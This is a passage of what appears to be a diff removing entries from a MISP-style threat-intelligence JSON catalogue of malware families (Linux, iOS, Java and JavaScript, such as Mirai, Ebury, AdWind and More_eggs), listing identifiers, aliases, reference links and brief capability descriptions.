"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" - ] - }, - "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", - "value": "Bashlite", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CDorked.A" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", - "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", - "https://blogs.cisco.com/security/linuxcdorked-faqs", - "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", - "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", - "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" - ] - }, - "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", - "value": "CDorked", - "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" - ] - }, - "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", - "value": "Chapro", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", - "https://github.com/pooler/cpuminer" - ] - }, - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", - "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" - ] - }, - "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", - "value": "Ebury", - "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" - ] - }, - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", - "https://www.recordedfuture.com/chinese-cyberespionage-operations/" - ] - }, - "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", - "value": "ext4", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", - "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://x86.re/blog/hajime-a-follow-up/", - "http://blog.netlab.360.com/hajime-status-report-en/", - "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", - "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", - "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", - "https://github.com/Psychotropos/hajime_hashes" - ] - }, - "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", - "value": "Hajime", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" - ] - }, - "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", - "value": "Hakai", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HNS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", - "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", - "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", - "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", - "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", - "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" - ] - }, - "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", - "value": "Hide and Seek", - "description": "" - }, - { - "meta": { - "synonyms": [ - "IoTroop", - "Reaper" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", - "https://research.checkpoint.com/new-iot-botnet-storm-coming/", - "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", - "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", - "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" - ] - }, - "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", - "value": "IoT Reaper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", - "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" - ] - }, - "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", - "value": "JenX", - "description": "" - }, - { - "meta": { - "synonyms": [ - "STD" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" - ] - }, - "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", - "value": "Kaiten", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", - "https://news.drweb.com/news/?i=10140&lng=en" - ] - }, - "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", - "value": "Lady", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" - ] - }, - "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", - "value": "MiKey", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", - "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", - "http://osint.bambenekconsulting.com/feeds/", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", - "https://isc.sans.edu/diary/22786", - "https://github.com/jgamblin/Mirai-Source-Code", - "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" - ] - }, - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", - "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", - "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", - "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" - ] - }, - "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", - "value": "Moose", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", - "https://news.drweb.com/?i=5760&c=23&lng=en" - ] - }, - "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", - "value": "MrBlack", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", - "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", - "https://twitter.com/ankit_anubhav/status/1019647993547550720", - "https://twitter.com/360Netlab/status/1019759516789821441", - "https://twitter.com/hrbrmstr/status/1019922651203227653", - "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", - "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", - "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" - ] - }, - "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", - "value": "Owari", - "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", - "https://twitter.com/juanandres_gs/status/944741575837528064" - ] - }, - "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", - "value": "Penquin Turla", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", - "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" - ] - }, - "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", - "value": "Persirai", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", - "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" - ] - }, - "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", - "value": "r2r2", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - ] - }, - "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", - "value": "Rakos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", - "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", - "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" - ] - }, - "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", - "value": "Rex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", - "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", - "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", - "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", - "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", - "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", - "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" - ] - }, - "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", - "value": "Satori", - "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", - "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" - ] - }, - "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", - "value": "ShellBind", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", - "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" - ] - }, - "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", - "value": "Shishiga", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", - "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" - ] - }, - "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", - "value": "Spamtorte", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", - "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" - ] - }, - "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", - "value": "SSHDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" - ] - }, - "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", - "value": "Stantinko", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", - "https://blog.avast.com/new-torii-botnet-threat-research" - ] - }, - "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", - "value": "Torii", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", - "http://paper.seebug.org/345/" - ] - }, - "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", - "value": "Trump Bot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Amnesia", - "Radiation" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", - "http://get.cyberx-labs.com/radiation-report" - ] - }, - "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" - ] - }, - "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", - "value": "Turla RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Espeon" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", - "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" - ] - }, - "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", - "value": "Umbreon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", - "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", - "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", - "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", - "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", - "https://blog.talosintelligence.com/2018/05/VPNFilter.html", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", - "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" - ] - }, - "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", - "value": "elf.vpnfilter", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" - ] - }, - "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", - "value": "elf.wellmess", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - }, - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "" - }, - { - "meta": { - "synonyms": [ - "splm", - "chopstick", - "fysbis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", - "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", - "https://twitter.com/michalmalik/status/846368624147353601" - ] - }, - "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", - "value": "Xaynnalc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", - "https://en.wikipedia.org/wiki/Xor_DDoS", - "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" - ] - }, - "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", - "value": "XOR DDoS", - "description": "Linux DDoS C&C Malware" - }, - { - "meta": { - "synonyms": [ - "darlloz" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", - "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" - ] - }, - "uuid": "9218630d-0425-4b18-802c-447a9322990d", - "value": "Zollard", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", - "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", - "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" - ] - }, - "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", - "value": "GuiInject", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - }, - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "The iOS malware that is installed over USB by osx.wirelurker" - }, - { - "meta": { - "synonyms": [ - "AlienSpy", - "JSocket", - "Frutas", - "UNRECOM", - "JBifrost", - "Sockrat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", - "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", - "http://malware-traffic-analysis.net/2017/07/04/index.html", - "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", - "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", - "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" - ] - }, - "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", - "value": "AdWind", - "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" - }, - { - "meta": { - "synonyms": [ - "Trupto" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", - "https://objective-see.com/blog/blog_0x28.html", - "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" - ] - }, - "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", - "value": "CrossRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Jacksbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", - "https://github.com/java-rat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", - "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" - ] - }, - "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", - "value": "jRAT", - "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", - "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] - }, - "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", - "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", - "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" - ] - }, - "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", - "value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." - }, - { - "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://www.digitrustgroup.com/java-rat-qrat/", - "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" - ] - }, - "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", - "https://github.com/shotskeber/Ratty" - ] - }, - "uuid": "da032a95-b02a-4af2-b563-69f686653af4", - "value": "Ratty", - "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", - "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" - ] - }, - "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", - "value": "AIRBREAK", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", - "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" - ] - }, - "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", - "value": "Bateleur", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", - "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", - "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] - }, - "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner." - }, - { - "meta": { - "synonyms": [ - "Roblox Trade Assist" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", - "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" - ] - }, - "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", - "value": "CukieGrab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", - "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", - "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" - ] - }, - "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" - ] - }, - "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", - "value": "magecart", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SpicyOmelette" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", - "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", - "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", - "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://blog.morphisec.com/cobalt-gang-2.0" - ] - }, - "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", - "value": "More_eggs", - "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", - 